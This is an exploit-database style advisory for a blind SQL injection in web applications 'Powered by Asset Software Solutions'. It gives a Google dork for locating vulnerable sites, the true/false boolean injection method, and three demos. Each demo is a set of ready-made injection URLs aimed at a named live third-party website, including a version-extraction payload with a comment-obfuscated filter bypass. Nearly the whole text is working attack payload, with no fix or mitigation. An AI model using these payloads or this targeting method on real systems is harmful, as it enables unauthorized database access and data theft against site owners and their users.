*********************************************************
#Exploit Title: Asset Software Solutions - Blind Sql Injection Vulnerability
#Date: 2021-10-06
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Asset Software Solutions"
#Category:webapps
#Tested On: windows 10, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* http://www.ssc.edu.in/newsdetails.php?id=26%27%20and%20false--+
* http://www.ssc.edu.in/newsdetails.php?id=26%27%20and%20true--+
* http://www.ssc.edu.in/newsdetails.php?id=26%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 2:
* https://sevabharathiangamaly.org/service_single.php?id=6%27%20and%20false--+
* https://sevabharathiangamaly.org/service_single.php?id=6%27%20and%20true--+
* https://sevabharathiangamaly.org/service_single.php?id=6%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 3:
* http://jmjcarsltd.co.nz/cardetails.php?id=67%27%20and%20false--+
* http://jmjcarsltd.co.nz/cardetails.php?id=67%27%20and%20true--+
* http://jmjcarsltd.co.nz/cardetails.php?id=67%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************